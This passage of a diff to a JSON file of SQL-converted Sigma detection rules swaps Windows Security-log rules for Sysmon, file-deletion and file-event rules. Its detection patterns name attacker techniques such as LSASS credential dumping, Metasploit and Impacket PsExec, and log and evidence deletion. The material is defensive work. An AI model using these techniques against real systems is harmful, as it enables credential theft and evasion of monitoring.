'%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "description": "Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of SDelete" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", - "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE EventID = '27'" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "There are no known false positives at this time" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "status": "experimental", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", "status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\'" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Remote Task Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "status": "experimental", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the IIS service", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" ], - "filename": "win_security_atsvc_task.yml" + "filename": "file_delete_win_delete_iis_access_logs.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1222.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Remote Service Activity via SVCCTL Named Pipe", - "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", - "status": "test", - "description": "Detects remote service activity via remote access to the svcctl named pipe", - "author": "Samir Bousseaden", + "title": "Backup Files Deleted", + "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "status": "experimental", + "description": "Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "attack.t1021.002" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitime usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' ESCAPE '\\'))" ], - "filename": "win_security_svcctl_remote_service.yml" + "filename": "file_delete_win_delete_backup_file.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "status": "experimental", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "title": "File Deleted Via Sysinternals SDelete", + "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitime usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "EventLog EVTX File Deleted", + "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Legitimate used of encrypted ZIP files" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" - }, - { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_delete_win_delete_event_log_files.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "Tomcat WebServer Logs Deleted", + "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the tomcat server", + "During log rotation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_delete_win_delete_tomcat_logs.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "status": "experimental", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1137.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" - ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" - }, - { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unlikely" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE TargetFilename LIKE 